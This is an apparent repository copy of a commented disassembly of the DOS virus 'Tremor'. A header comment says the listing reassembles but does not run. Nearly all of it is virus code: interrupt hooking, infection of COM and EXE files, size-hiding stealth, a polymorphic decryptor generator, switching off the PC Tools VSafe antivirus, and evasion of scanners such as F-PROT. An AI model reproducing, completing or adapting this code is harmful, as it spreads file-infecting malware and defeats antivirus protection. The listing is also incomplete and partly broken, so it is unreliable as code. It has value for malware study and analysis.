2021-01-12 18:01:59 -06:00

2267 lines
82 KiB

;-- you can reassemble it, but the cod will not run.
;-- i have had no time to make it work (and there is no need for)
;-- but you will see, how tremor works.
paras_needed equ 10ch
old__ds equ offset old__si-23
old__es equ offset old__si-17
old__ax equ offset old__si-12
old__bx equ offset old__si-9
old__cx equ offset old__si-6
old__dx equ offset old__si-3
old__di equ offset old__si+3
old__bp equ offset old__si+6
dtastruc struc
reserv db 15h dup (?)
attr db ?
time dw ?
date dw ?
fsize dd ?
fname db 13 dup (?)
code_seg segment
assume cs:code_seg
org 0 ; !!
flag db ?
db 85h dup (?)
internal_21 dd ?
dd ?
tremor_24 dd ?
tremor_21 dd ?
orig21 dd ?
internal_15 dd ?
tremor_15 dd ?
xres db 15h dup (?)
xattr db ?
xtime dw ?
xdate dw ?
xsize dd ?
xfname db 13 dup (?)
extra dw ? ;
start: mov di,offset frstbyte+100h ; psp segment !!
and ax,ax
init_bx equ $+1
mov bx,0
mov cx,891h
push ds
pop es
locloop_3: xor [di],bx
add bx,0
sub di,-2
loop locloop_3
frstbyte: jmp virinstall
db 0ebh,0bh
jmp virinstall
virint21done: call getorigregs
loc_5: jmp toold21
virint21: cmp byte ptr cs:[BP_Flag],1 ; "disabled"
je loc_5
mov word ptr cs:[offset old__si],si
mov si,offset old__si
mov cs:[si+(offset old__ds-offset old__si)],ds
push cs
pop ds
mov ds:[si+(old__ax)],ax
mov ds:[si+(old__bx)],bx
mov ds:[si+(old__cx)],cx
mov ds:[si+(old__dx)],dx
mov ds:[si+(old__di)],di
mov ds:[si+(old__bp)],bp
mov ds:[si+(old__es)],es
cmp byte ptr ds:[si+(offset flickerflag-offset old__si)],1
psycholabel: jmp loc_8
add al,ah
and al,0fh
add ah,al
and ah,0fh
push ax
mov dx,3dah
in al,dx
pop bx
mov al,8
mov ah,bl
mov dl,0d4h
out dx,ax
mov dl,0c0h
mov al,33h
out dx,al
mov al,bh
out dx,al
call getorigregs
push ax
xor cx,cx
mov al,0b6h
out 43h,al
mov cl,ah
shl al,1
shl cx,1
in al,61h
push ax
or al,3
out 61h,al
locloop_7: loop locloop_7
pop ax
out 61h,al
pop ax
loc_8: cmp ah,57h ; get/set filestamp
je handlefkts
cmp ah,42h ; seek in file
je handlefkts
cmp ah,3fh ; read file
db 74h ; JZ
disablhndchk db offset chkflhandl-offset $+2
cmp ah,50h ; set psp
jb loc_9
cmp ah,6ch ; ext. create
jb loc_13
loc_9: cmp ah,30h ; get dos-version....
jne loc_11 ; normally 1st call of each prog !
chkflhandl: cmp bl,4 ; diskfile ?
ja handlefkts
loc_11: cmp ah,3ch ; create/overwrite file
ja loc_12
cmp ah,12h ; findnext /fcb
ja loc_13
loc_12: cmp ah,0eh ; set curr. disk
ja handlefkts
loc_13: jmp virint21done
; file-handle operations
handlefkts: xor bx,bx
call checkforvsafe
mov byte ptr cs:[org4ad],cl
mov al,0
call set_com_flag
mov al,15h ; get int 15h
mov di,offset tremor_15
call getint
mov di,offset internal_15 ; set int 15h
call setint
mov al,21h ; get int 21h
mov di,offset tremor_21
call getint
mov di,offset internal_21 ; set int 21h
call setint
mov al,24h ; get int 24h
mov di,offset tremor_24
call getint
mov dx,posint24
push cs ; set int 24h
pop ds
call setint1
call getorigregs
; read file via handle
cmp ah,3fh
je fktreadhndl
jmp loc_24
fktreadhndl: jcxz loc_16 ; "nothing to do"
mov ax,5700h ; get filestamp (infected..)
call performint21
jc loc_16 ; error ->... bye
cmp dh,0c7h ; dh > c7 -> infected
ja loc_17
loc_16: jmp chain
loc_17: call readfirstbytes
jc loc_16
call checkifinfected
jnz loc_16
call trem_popall
mov bx,word ptr cs:[filesize ]
mov dx,word ptr cs:[filesize+2]
call chkfilesize
ja loc_18
add bx,cx
adc dx,0
call chkfilesize
jbe loc_19
sub bx,word ptr cs:[data_x01]
sub bx,cx
neg bx
push bx
jmp loc_20
loc_18: xor cx,cx
loc_19: push cx
loc_20: call getorigregs
pop cx
call performint21
jc loc_23
push ax
push si
push di
push ds
push es
push ds
pop es
push cs
pop ds
mov di,word ptr ds:filesize
cmp word ptr ds:[di+3],0 ; check hi-word of filesize
ja loc_22 ; > 64kb -> bye
cmp word ptr [di],18h ; check lo-word of filesize
jae loc_22 ; > 24 byte -> jmp
mov ax,[di] ; ( error ?!?)
mov di,dx
mov si,ax
add si,offset buffer
cmp cx,18h
jb loc_21
sub ax,18h
neg ax
xchg ax,cx
loc_21: cld
rep movsb
loc_22: pop es
pop ds
pop di
pop si
pop ax
loc_23: jmp loc_27
; seek to end of file / handle
loc_24: cmp ax,4202h
jne loc_28
mov ax,5700h ; get timestamp
call performint21
jnc loc_26
chain: jmp chaintoint21
loc_26: cmp dh,200 ; dh < 0c8 -> not infected
jb chain
call readfirstbytes
jc chain
call checkifinfected
jnz chain
call trem_popall
sub dx,4000 ; seek to "real" end of file...
sbb cx,0 ; cx:dx ist position from eof
call performint21
loc_27: mov cx,word ptr cs:[old__cx] ;
jmp back
; get/set memblock
loc_28: db 0ebh
enablegetmem db offset loc_31-offset $+2 ; jmp short loc_31
cmp ah,4ah ; set mem-block
je loc_29
cmp ah,48h ; get mem
jne loc_31
loc_29: call trem_popall
call performint21
jnc back ;
cmp al,8 ; "out of memory" !
jne back ;
sub bx,paras_needed ; amount of possible memory
stc ; to request...
back: jmp backtocaller
; findfirst / findnext via handle
loc_31: db 0ebh
enablehandle db 0
cmp ah,4eh
jb loc_37
cmp ah,4fh
ja loc_37
call performint21 ; do it and check result..
push ax
jc goback
call getdta ; -> dta=es:bx ,
; al = c8
cmp byte ptr es:[],al ;
jb goback ; not infected
sub byte ptr es:[],al ; else "des"-infect
mov si,1ah ; now : check size
loc_32: cmp byte ptr es:[bx+si+2],0 ; low-byte of high-word
jne loc_33 ; always strip off
; virussize between
; 64kb and 1mb ?!?
cmp word ptr es:[bx+si ],8192 ; minsize to infect
jb goback
loc_33: sub word ptr es:[bx+si ],4000 ; vir-size..
sbb word ptr es:[bx+si+2],0
goback: call trem_popall
pop ax
loc_35: popf
backtocaller: retf 2 ; end of int 21h.......
; findfirst / findnext / fcb
loc_37: cmp ah,11h
jb xcreate
cmp ah,12h
ja xcreate
call performint21
push ax
cmp al,0ffh ; error
je goback
call getdta ; al=c8
cmp byte ptr es:[bx],0ffh ; extended fcb..
jne loc_38
add bx,7
loc_38: cmp byte ptr es:[bx+1ah],al ; f-attribut.....
jb goback
sub byte ptr es:[bx+1ah],al ; stealth it
mov si,1dh
jmp loc_32
; extended open / create / replace
xcreate: cmp ah,6ch
jne chkifopen
mov dx,si
jmp hopenfile
; open file / get handle
chkifopen: cmp ah,3dh
jne chkifclose
hopenfile: inc word ptr cs:[random_1]
cmp al,2 ; open r/w ?
jne chkifclose
des_infect_it: call clean__file ; ! interesting
jmp loc_50
; close file / release handle
chkifclose: cmp ah,3eh
jne checkiftimestamp
call performint21 ; perform close file
push ax ; result
jc readfhdone ; error -> nothing else to do
call getflag_cs_00 ; get flag
cmp bl,al ; bl was filehandle
jne readfhdone
call setflag_cs_00 ; al to flagpos
push cs
pop ds
mov dx,2
call do_infect
readfhdone: jmp goback
; get/set files datetime
cmp ah,57h
jne call_checkfortremor
cmp al,1 ; set timestamp
je issettime
call trem_popall ; get timestamp........
call performint21
jc return2caller
cmp dh,200
jb return2caller
sub dh,200
return2caller: jmp loc_35
issettime: cmp dh,200
jb isnot2000
sub byte ptr cs:[old__dx],200
isnot2000: call readfirstbytes
jc loc_50
call seekbeginoffile
call infect_file
jc loc_50
call sub_17
call trem_popall
add dh,200
call performint21
sub dh,200
jmp return2caller
call checkfortremor
; programm-ende
cmp ah,4ch
jne loc_51
mov cs:[offset enablehandle],0
mov cs:[offset disablhndchk],offset chkflhandl-offset disablhndchk+1
loc_50: jmp loc_55
; exec
loc_51: cmp ah,4bh
je loc_52
jmp loc_60
loc_52: call setflag_cs_00 ; al->cs:00
cmp al,0 ; exec or load ovl ?
je loc_53 ; = 0 -> exec
jmp des_infect_it
loc_53: db 0ebh
watchfiles db 0
mov dx,-paras_needed ; 10ch
call GetTremMem; setzt 29dh auf 0
push cs
pop ds
mov ds:[watchfiles ],offset loc_0053-offset loc_53+2
mov ds:[enablegetmem],offset loc_31-offset loc_28+2
mov ds:[enablehandle],0
loc_0053: call getorigregs
call findfile ;
jc loc_55
cmp byte ptr cs:[tempdta],3 ; drive c: ?
jb loc_55 ; no, floppy
mov ax,word ptr cs:[tempdta.fname]
cmp ax,4248h ; "HB"scan
je loc_54
cmp ax,4c43h ; "CL"ean
je loc_54
cmp ax,4353h ; "SC"an
jne loc_56
loc_54: call getorigregs
call clean__file ; !!
call setflag_cs_00 ; flag = -1
loc_55: jmp chaintoint21
loc_56: push cs
pop es
mov di,offset specialfiles
mov cx,8 ; 8 filenames
repne scasw
jnz loc_58
cmp ax,4843h ; "CH"
jne loc_57
cmp word ptr cs:[tempdta.fname+2],444bh; "KD"
jne loc_57 ;------------------------
; else : chkdsk running !
mov byte ptr cs:[enablehandle],offset xcreate-offset loc_31+2
loc_57: call getrealmemorysize
mov byte ptr cs:[watchfiles],0
loc_58: cmp word ptr cs:[tempdta.fname+1],4a52h; "RJ"
jne loc_59
mov byte ptr cs:[disablhndchk],offset handlefkts-offset disablhndchk+1
loc_59: call getorigregs
jmp loc_61
; get / set file-attribut
loc_60: cmp ah,43h
jne chaintoint21 ;
or al,al ; is it "get"
jnz loc_62 ; no -> jmp
cmp bx,0faceh ; is it tremor who calls ?
jne chaintoint21 ; no -> jmp
loc_61: call checkif_com_file; zf = com-file
jnz loc_62
mov al,1
call set_com_flag
loc_62: call getorigregs
call do_infect
chaintoint21: call trem_popall
cmp word ptr cs:[offset my_call],ax
jne toold21
org_487 equ $+2
mov ax,word ptr cs:[random_1]
toold21: jmp dword ptr cs:[internal_21]
; virus-s :
; get int in al to dword cs:di
getint: mov ah,35h
call performint21
mov cs:[di],bx
mov word ptr cs:[di+2],es
resetints: mov al,15h ; set int 15h to cs:tremor_15
mov di,offset tremor_15
call setint
mov al,21h ; set int 21h to cs:tremor_21
mov di,offset tremor_21
call setint
org4ad equ $+1
mov bl,81h
call checkforvsafe
mov al,24h ; set int 24h
mov di,offset tremor_24
setint: mov dx,cs:[di]
mov bx,word ptr cs:[di+2]
mov ds,bx
setint1: mov ah,25h ;
performint21: pushf
call dword ptr cs:[internal_21]
getdta: mov ax,2fc8h ; set dta
jmp performint21
getsetfattr: mov ah,43h ;
jmp performint21
mov ah,57h ; get/set filestamp
jmp sethandlecall21
mov cx,-1
mov dx,-32 ; cx:dx = -32
mov al,2
call seek ; seek from eof
read_32: mov ah,3fh
mov cx,20h ; read last 32 byte
setbuff: mov dx,offset buffer; filename/buffer
tempfhandle equ $+1
sethandlecall21:mov bx,5
jmp performint21
writeexeheader: mov cx,18h
truncate: mov ah,40h ; write to file
jmp setbuff
opendestfile: mov bp,dx
mov al,0
call getsetfattr ; get attr
jc loc_ret_72
mov word ptr cs:[origfattr],cx
test cl,3 ; r/o or hidden ?
jz loc_71 ; no, jmp
mov al,1
xor cx,cx ; set attr to "none"
call getsetfattr ; set attr
jc loc_ret_72
loc_71: mov ax,3d92h ; open file
call performint21
jc loc_ret_72
mov word ptr cs:[tempfhandle],ax
mov al,0 ; get
call getsetfilesdatetime
mov word ptr cs:[origfdate],dx
mov word ptr cs:[origftime],cx
loc_ret_72: retn
readfirstbytes: mov word ptr cs:[tempfhandle],bx
read32byte: mov al,1
call seekinfile ; seek from current position
jc loc_74
push ax
push dx
push ds
push cs
pop ds
mov word ptr ds:[filesize ],ax ;
mov word ptr ds:[filesize+2],dx
call read_first_32byte ; buffer = ds:104dh
pop ds
pop cx
pop dx
jc loc_73
cmp ax,20h ; read 32 byte ok ?
jne loc_73
seekstartoffile:mov al,0 ; ok. seek begin of file !
jmp seek ; and return !
loc_73: call seekstartoffile ; and 2*return
loc_74: stc
sub_17: mov al,0
filesize equ $+1
mov dx,0 ; dummy-code to save
mov cx,0 ; data (filesize).
xor ax,ax
seekinfile: xor cx,cx
mov dx,cx
seek: mov ah,42h ; seek
jmp sethandlecall21
setinfectdate: mov al,1 ; set files date-time
origfdate equ $+1
mov dx,0deafh
origftime equ $+1
mov cx,2800h
call getsetfilesdatetime
mov ah,3eh ; close file
call sethandlecall21
call getorigregs
origfattr equ $+1
mov cx,20h
mov al,1
jmp getsetfattr
mov di,dx
mov cx,80
mov al,'.' ; serach for "."
push ds
pop es
repne scasb
jnz loc_ret_78
mov ax,[di]
or ax,6060h ; 4f43h or 6060h => 6f63h
cmp ax,6f63h ; 4f43h = "co"
loc_ret_78: retn
do_infect: call checkforfprot
jz loc_82
call opendestfile
jnc loc_79 ; no error -> jmp
cmp al,3 ; error = file not found ?
ja loc_80 ; yes -> return
loc_79: call readheader
jnc loc_80
call add200toyear
call infect_file
loc_80: jmp setinfectdate
dontinfect: sub byte ptr cs:[1+origfdate],200
loc_82: stc
infect_file: call checkifinfected
jz loc_82
push cs
pop ds
call read_32
jc dontinfect
mov si,offset buffer
call test_com_flag
jnz loc_83
cmp byte ptr [si],0e9h ; long jmp
je loc_84
mov al,0
call set_com_flag
loc_83: cmp word ptr [si],5a4dh ; 'MZ'
jne dontinfect
cmp word ptr ds:[si+18h],40h; start of reloc-table
je dontinfect ; 40h => *.dll !
; it doesnt try to infect
; windows and os/2-software
loc_84: mov ax,ds:[si+10h] ; sp-init
cmp ax,2f0h ;
je dontinfect
cmp ax,510h
jb loc_85
cmp ax,522h
jb dontinfect
loc_85: call test_com_flag
jnz loc_86 ; ??!
loc_86: mov word ptr ds:[init_sp],ax
mov ax,ds:[si+14h] ; get init-ip
call test_com_flag
jnz loc_87
mov ax,ds:[si+1]
mov word ptr ds:[init_jump],ax
mov ax,100h
loc_87: mov word ptr ds:[init_ip],ax
call test_com_flag
jz loc_88
mov ax,word ptr ds:[si+4] ; nr of 512-pages
cmp ax,10h
jb dontinfect
dec ax
mov dx,512
mul dx
add ax,word ptr ds:[si+2] ; add rest of file
adc dx,0
push ax ; files size (without overlays !!)
push dx
loc_88: mov al,2
call seekinfile ; seek from eof
mov ds:[si+18h],ax ; low filesize -> reloc-entry
mov ds:[si+1ah],dx ; high filesize
call test_com_flag
jnz loc_90
or dx,dx ; file > 64kb (its a com-file !)
jnz skip_file
cmp ah,0d6h ; file > 54784 byte
ja skip_file
cmp ah,20h
jb skip_file ; file < 8192 byte
mov di,ax
sub di,3
jmp loc_91
skip_file: jmp dontinfect
loc_90: pop bp ; file-size
pop di
cmp ax,di
jne skip_file
cmp dx,bp
jne skip_file
cmp dx,0fh ; > 968kb !
ja skip_file
mov di,ax
and di,0fh ; filesize mod 15
loc_91: mov word ptr ds:[org_895],di
push di
mov cl,4
shr ax,cl
ror dx,cl
add ax,dx
sub ax,ds:[si+8]
push ax
push ax
push ax
add ax,di
push ax
mov ah,2ah ; get system-date
call performint21
add dh,3
cmp dh,0dh
jb loc_92
sub dh,0ch
inc cx
loc_92: mov word ptr ds:[org_ceeh],cx
mov word ptr ds:[org_ce8h],dx
mov ah,2ch
call performint21 ; get system-time
pop ax
add ax,cx
add ax,dx
neg ax
mov word ptr ds:[si+1ch],0deadh ;-)
mov word ptr ds:[si+1eh],ax
xor ax,0deafh
mov word ptr ds:[org_7e6],ax
mov word ptr ds:data_0109,ax
call sub_29
mov word ptr ds:[org_8ee],ax
mov word ptr ds:[org_8df],bx
pop ax
sub ax,bx
sub ax,ds:[si+16h]
mov word ptr ds:[init_cs],ax
pop ax
sub ax,bx
sub ax,word ptr ds:[si+0eh]
mov word ptr ds:[init_ss],ax
shl bx,1
mov word ptr ds:[org_883],bx
push si
push cs
pop es
; codemachine starts
mov si,offset data_x01
mov di,si
push si
lodsw ; data_x01:data_x02 -> bx:ax
xchg ax,bx
xchg al,ah ; bx:ax=bhblahal -> bhblalah
xchg bl,bh ; blbhalah
xchg ah,bl ; ahbhalbl
xchg ax,bx ; bhahblal
stosw ;data_x01:data_x02 <- ax:bx
xchg ax,bx
mov ah,2ch ; get sys-time
call performint21
mov bp,cx
add bp,dx
mov bx,cx
mov cl,4
shl bl,cl
and dh,0fh
or dh,bl
mov dl,bh
shl dl,cl
push dx
mov ah,2ah ; get sys-date
call performint21
add bp,dx
neg bp
mov cx,dx
pop dx
or dl,al
mov di,offset extra
mov ax,bp
call sub_29
mov word ptr ds:[org_8f5],ax
mov word ptr ds:[org_8a5],ax
mov word ptr ds:[org_8e6],bx
mov bx,word ptr ds:[random_1]
pop si
;-----------------------------------( code-generator)---
test dl,1
jz loc_94
mov al,26h ; es:
test ch,2 ; cx !=10.0000b = es:
jz loc_93
mov al,6 ; push es
mov al,1fh ; pop ds
loc_93: stosb
loc_94: lodsb
call sub_30
call sub_30
call sub_30
call sub_30
test dl,1
jnz loc_97
test bl,15h
jnz loc_95
mov ax,71eh
jmp loc_97
loc_95: mov al,0f2h ; repnz
test ch,1
jz loc_96
inc ax ; repz
loc_96: stosb
loc_97: push di
sub si,4
call test_com_flag
jz loc_98
mov al,36h ; ss:
loc_98: mov al,31h
mov byte ptr ds:data_103,al ; xor [di],al
test dh,40h
jz loc_99
mov byte ptr ds:data_103,1 ; add [di],ax
mov al,29h
loc_99: mov byte ptr ds:[org_1081],al ; sub [di],al
mov al,1ch ; sbb reg8bit,abs
test dh,2
jz loc_100
inc al ; sbb reg16bit,abs
loc_100: test cl,3
jz loc_101
sub al,8 ; adc reg16bit,abs
loc_101: stosb
call sub_32
test bl,1
jz loc_102
call insertnearjmp
loc_102: mov byte ptr ds:data_0108,5 ; add ax,xxxx
cmp ch,0ah
jb loc_103
test cl,3
jnz loc_103
mov ax,5f8dh
xor ax,ax
mov al,bl
or al,40h
mov word ptr ds:data_0109,ax ; add ax,xxxx
jmp loc_106
loc_103: mov al,81h
mov al,0c3h
test cl,3
jz loc_104
dec ax
loc_104: test dl,2
jz loc_105
add al,30h
mov byte ptr ds:data_0108,35h
loc_105: stosb
org_7e6 equ $+1
mov ax,0f6f5h
loc_106: test bl,1
jnz loc_107
call insertnearjmp
loc_107: test dh,3
jz loc_109
call sub_32
mov al,83h ; sub si,-11
mov al,0eeh
test dh,2 ; dh, bit 2 ="1" -> di
jz loc_108
inc ax ; sub di,-11
loc_108: stosb
mov al,0feh
jmp loc_111
loc_109: mov al,46h ; inc si
test dh,2
jz loc_110
inc ax ; inc di
loc_110: stosb
push ax
call sub_32
pop ax
loc_111: call sub_32
test bl,3
jnz loc_112
test dl,10h
jnz loc_112
cmp ch,3
ja loc_112
mov al,0e2h
jmp loc_116
loc_112: mov al,49h ; dec cx
test dl,10h ; dl!=1000b = use cx
jz loc_113 ; dl =1000b = use bp
add al,4 ; dec bp
loc_113: test bl,3
jz loc_114
sub al,8 ; inc bp / inc cx
loc_114: stosb
call sub_32
cmp ch,0ah
jb loc_115
test cl,3
jz loc_117
loc_115: test dh,3
jnz loc_117
test dl,2
jz loc_117
mov al,77h
loc_116: jmp loc_118
loc_117: mov al,75h
loc_118: stosb
pop ax
dec ax
sub ax,di
test di,1
jnz loc_120
mov al,bl
and al,7
or al,90h
cmp al,94h
jne loc_119
inc ax
loc_119: stosb
loc_120: mov ax,0edh
sub ax,di
shr ax,1
add ax,7b0h
mov ds:data_x02,ax
org_883 equ $+1
add ax,0deh
test bl,3
jz loc_121
neg ax
org_88d equ $+1
loc_121: mov word ptr ds:[init_bx],ax
mov ax,di
mov ds:data_x01,ax
org_895 equ $+1
add ax,0c36ch
sub ax,offset extra
call test_com_flag
jnz loc_122
add ax,103h
jmp loc_123
org_8a5 equ $+1
loc_122: add ax,4f0h
org_8a8 equ $+1
loc_123: mov word ptr ds:[extra+1],ax
mov al,0e9h
len_of_jmp equ $+1
mov ax,0cd5h
sub ax,di
pop si
call scramblebuffer
mov al,2
call seekinfile
call sub_58
jnc loc_125
loc_124: pop ax
pop ax
jmp dontinfect
loc_125: cmp ax,cx
jne loc_124
call seekbeginoffile
call scramblebuffer
call test_com_flag
jnz buildexeheader
pop ax
pop ax
mov ds:[si+1],ax
jmp loc_127
buildexeheader: pop ax
push ax
org_8df equ $+1
sub ax,006fh
mov ds:[si+16h],ax ; cs_init
pop ax
org_8e6 equ $+1
sub ax,004fh
mov ds:[si+0eh],ax ; ss_init
pop ax
push ax
org_8ee equ $+1
add ax,06f0h
mov ds:[si+14h],ax ; ip_init
pop ax
org_8f5 equ $+1
add ax,04f0h ; = 1264 dec
add ax,1080h ; = 4224 dec, sum=5488 dec
mov ds:[si+10h],ax ; sp_init
mov ax,word ptr ds:[si+2] ; get lastbytes
add ax,4000
cwd ; = xor dx,dx
mov bx,200h
div bx
add word ptr ds:[si+4],ax ; nr of pages
mov word ptr ds:[si+2],dx ; lastbytes
loc_127: jmp writeexeheader
readheader: call read32byte
chkdate200: mov al,byte ptr cs:[origfdate+1]
mov ah,200
cmp al,ah
add200toyear: add al,ah
mov byte ptr cs:[origfdate+1],al
test_com_flag: cmp byte ptr cs:[com_flag],1
set_com_flag: mov byte ptr cs:[com_flag],al
sub_29: mov cl,4 ; ax = 1234h -> ax=0230h
and ax,0ff0h ; bx=0023h
mov bx,ax ; cl=4
shr bx,cl
; code-generator
; oh god !
; why does somebody, that can write such a machine, waste his time
; writing the virus around ?? i'll never understand it.
sub_30 proc near
push ax
mov ah,bl
and ah,3
cmp al,ah
jne loc_130
test dl,1
jz loc_128
mov al,85h ; test
jmp loc_129
loc_128: mov al,23h
test cl,2
jz loc_129
mov al,0bh ; or
loc_129: mov ah,0c0h
mov al,bl
and al,7
add al,ah
loc_130: pop ax
cmp al,3
je loc_ret_139
cmp al,2
je loc_136
cmp al,1
je loc_133
call test_com_flag
jz loc_131
cmp bl,6
ja loc_131
mov al,8dh
mov al,1eh
test cl,3
jz loc_132
mov al,16h
jmp loc_132
loc_131: mov al,0bbh
test cl,3
jz loc_132
dec ax
loc_132: stosb
mov ax,bp
mov word ptr ds:init_ip,ax
loc_133: call test_com_flag
jz loc_134
cmp bl,0fch
jb loc_134
mov al,8dh ; 8d 36 -> lea si,offset
mov al,36h
test dh,2
jz loc_135
mov al,3eh ; 8d 3e -> lea di,offset
jmp loc_135
loc_134: mov al,0beh ; 8d be -> lea di,[bp+...]
test dh,2
jz loc_135
inc ax ; 8d bf -> lea di,[bx+...]
loc_135: stosb
mov word ptr ds:[org_8a8],di
loc_136: call test_com_flag
jz loc_137
test bh,5
jz loc_137
mov al,8dh ; 8d 0e -> lea,cx,[xxxx]
mov al,0eh ;
test dl,10h
jz loc_138
mov al,2eh ; 8d 2e -> lea bp,[xxxx]
jmp loc_138
loc_137: mov al,0b9h ; mov al,"mov cx,xxxx"
test dl,10h
jz loc_138
mov al,0bdh ; mov al,"mov bp,xxxx"
loc_138: stosb
mov word ptr ds:[org_88d],di
loc_ret_139: retn
sub_30 endp
insertnearjmp: test ch,3
jnz loc_ret_140
xor ax,ax
mov al,bl
and al,7
add al,78h ; 78..7f -> near jmp
loc_ret_140: retn
sub_32: lodsb
test ch,2
jz loc_143
cmp al,1
jne loc_ret_142
mov al,0fch ; mov al,'cld'
test dh,80h
jz loc_141
dec ax ; mov al,'sti"
loc_141: stosb
loc_ret_142: retn
loc_143: cmp al,3
jne loc_ret_142
mov al,90h ; mov al, "nop"
test dh,80h
jz loc_144
mov al,2eh ; mov al,"cs:"
loc_144: stosb
findfile proc near
push dx
push ds
push es
push bx
mov ah,2fh ; get dta
call performint21
push bx
push es ; es:bx = dta
push ds ; ds:dx remains constant
push dx
mov ah,1ah
push cs
pop ds
mov dx,offset tempdta ; set dta
call performint21
pop dx ;
pop ds
mov cx,27h ; anyfile
mov ax,4e00h ; find first
call performint21
pop ds
pop dx
mov al,byte ptr cs:[]
mov ah,1ah ; re-set dta
call performint21
pop bx
pop es
pop ds
pop dx
findfile endp
; desinfecting open files
clean__file: call checkforfprot
jz loc_145
call findfile
jc loc_145
cmp al,200 ; = hibyte of files date
jb loc_145
call opendestfile
jnc loc_146 ; no err -> jmp
cmp al,3 ; error = file not found ?
ja loc_149 ; no -> jmp
loc_145: stc ; else return
loc_146: call chkdate200
jc loc_149
call readheader
jc loc_147
neg ah
call add200toyear ; but here : "sub"..
loc_147: call checkifinfected
jnz loc_149
push ds
push es
push cs
pop es
mov si,bp
mov di,2
call getflag_cs_00
cmp al,0ffh
jne loc_148
mov ah,60h ; get truename
call performint21 ; to es:di
mov word ptr es:[di-2],bx
loc_148: pop es
pop ds
call desinfect
loc_149: jmp setinfectdate
; desinfect physically
desinfect: push cs
pop ds
call writeexeheader
mov dx,word ptr ds:[data_x01]
mov cx,word ptr ds:[data_x02]
mov al,0 ; seek from begin of file
call seek ; to filepos cx:dx
xor cx,cx
jmp truncate ; write 0 byte -> truncate tremor
checkifinfected:call scramblebuffer
cmp word ptr cs:[1ch+si],0deadh
jne loc_ret_150 ; back with nz !
cmp byte ptr cs:[si],0e9h
je loc_ret_150
cmp word ptr cs:[si],5a4dh
loc_ret_150: retn
scramblebuffer: mov si,offset buffer
push si
mov ax,cs:[si+1eh]
loc_151: xor cs:[si],ax
add ax,913fh
inc si
inc si
cmp si,106bh
jne loc_151
pop si
setflag_cs_00: mov byte ptr cs:[flag],0ffh
getflag_cs_00: mov al,cs:[flag]
; out : real mem-top
mov dx,paras_needed ; dx = 10ch
nop ; dx = - 10ch
mov byte ptr cs:[enablegetmem],0 ; enable mem-handler
mov ah,52h
call performint21
call getfrstmcb
loc_152: cmp byte ptr [di],5ah
je lastmcbfound
push ds
pop es
call getnextmcb
jmp loc_152
lastmcbfound: add ds:[di+3],dx ; = add / sub 10ch
; out : ds = seg of next mcb in chain
getnextmcb: mov ax,ds
inc ax
add ax,ds:[di+3]
mov ds,ax
; out : es=dos-segment and ds:si = first mcb
get_1stmcb: mov ah,52h
int 21h
getfrstmcb: lds di,dword ptr es:[bx-4] ; get first mcb
chkfilesize: cmp dx,word ptr cs:[data_x02]
jne loc_ret_154
cmp bx,word ptr cs:[data_x01]
loc_ret_154: retn
checkforfprot: mov byte ptr cs:[BP_Flag],1
mov ax,0ff0fh
call dword ptr cs:[tremor_21]
cmp ax,101h
mov byte ptr cs:[BP_Flag],0
;int 13 - pc tools v8+ vsafe, vwatch - api
; ah = fah
; dx = 5945h
; al = function (00h-07h)
;return: varies by function
checkforvsafe: mov ax,0fa02h ; switch it off
mov dx,5945h
int 13h
message1: db "-=> t.r.e.m.o.r was done by neurobasher /"
db " may-june'92, germany <=-",0
message2: db "",0
newint15: push ax
in al,60h
cmp al,53h ; del-key pressed
jnz no_del_key ; no->bye
push ds
mov ax,40h
mov ds,ax
mov al,byte ptr ds:[17h]
test al,1100b ; ctrl+alt pressed ?
jz bye_int09
push bx
push cx
push dx
push si
mov ax,700h
xor bx,bx
mov cx,bx
mov dx,187fh
int 10h
mov ah,02
mov dx,907h ; set cursor
int 10h
mov si,offset message1
call print_message
mov dx,0f13h
int 10h
mov si,offset message2
call print_message
mov cx,96h
locloop_155: push cx
mov cx,0ffffh
locloop_156: jmp $+2
loop locloop_156
pop cx
loop locloop_155
pop si
pop dx
pop cx
pop bx
bye_int09: pop ds
no_del_key: pop ax
jmp dword ptr cs:[internal_15]
print_message: mov al,cs:[si]
xor al,9ch
cmp al,0
je loc_ret_160
int 29h
inc si
jnz print_message
loc_ret_160: retn
; reset ints + registers.
trem_popall: cli
call resetints
getorigregs: mov ax,03c4h
mov ds,ax
mov ax,9ef5h
mov es,ax
mov ax,4300h
mov bx,0faceh
mov cx,1989h
mov dx,000eh
db 0beh ; mov si,xxxx
old__si dw 11b7h
mov di,008ah
mov bp,0070h
flickerflag equ $+1
random_1 dw 0
checkfortremor: xor bx,bx
mov ds,bx
lds si,dword ptr ds:[4+bx] ; int 01 starts with iret ?
cmp byte ptr [si],0cfh
jne loc_162 ; no -> jmp
cmp ah,30h ;
jne loc_164
push cx ; save cx,dx
push dx
mov ah,2ah ; get system-date
call performint21
pop bx
pop bp
mov ax,offset random_1 ; compare cx,dx to sys-dat
cmp bp,cx ; tremor first calls sys-date
jne loc_163 ; then dos-version.
cmp bx,dx ; -- extended self-check.
jne loc_163
loc_162: mov ax,offset selftest
loc_163: mov word ptr cs:[org_487],ax
loc_164: jmp getorigregs
newint01: push ax
push bx
push si
call reloc_int1
reloc_int1: pop si ; si = offset reloc_int1
mov bx,sp
mov ax,ss:[bx+8] ; callerseg
Dos_Seg equ $+1
cmp ax,129h
ja loc_165
mov cs:[si+offset trace_result-offset reloc_int1+2],ax
mov ax,ss:[bx+6] ; caller-offset
mov cs:[si+offset trace_result-offset reloc_int1 ],ax
and byte ptr ss:[bx+0bh],0feh; reset tf
jmp loc_166
loc_165: push cs
pop ax
cmp ax,ss:[bx+8] ; first steps
je loc_166 ; or end of int
mov ax,ss:[bx+8]
mov cs:[si+offset tracetemp-offset reloc_int1+2],ax
mov ax,ss:[bx+6]
mov cs:[si+offset tracetemp-offset reloc_int1 ],ax
loc_166: pop si
pop bx
pop ax
SpecialFiles db 'CH'
Trace_Result db 'ME','MI'
db 'F2','F-'
Tracetemp db 'SY','SI'
db 'PM'
; chkdsk
; mem
; mirror
; f-prot
; sys
; si
; unused :
AnyFile db '\*.*',0
BP_Flag dw 0 ;
dw 0
db 0,0,0
; installation
virinstall: call cda
cda: pop si
mov ah,2ah ; get current date
mov word ptr cs:[si+offset start_psp-offset cda],es
int 21h
mov al,72h ; "jb"
org_ce8h equ $+2
cmp dx,504h ; now : 4. mai ?
jb loc_168 ; previous -> jmp
org_ceeh equ $+2
cmp cx,7c9h ; 1993 ?
org_cf0 equ $
jae loc_169 ; after -> jmp
loc_168: mov al,0ebh ; "jmp"-> disable psycho...
loc_169: mov cs:[si+offset psycholabel-offset cda],al
mov ah,30h
int 21h
xchg al,ah
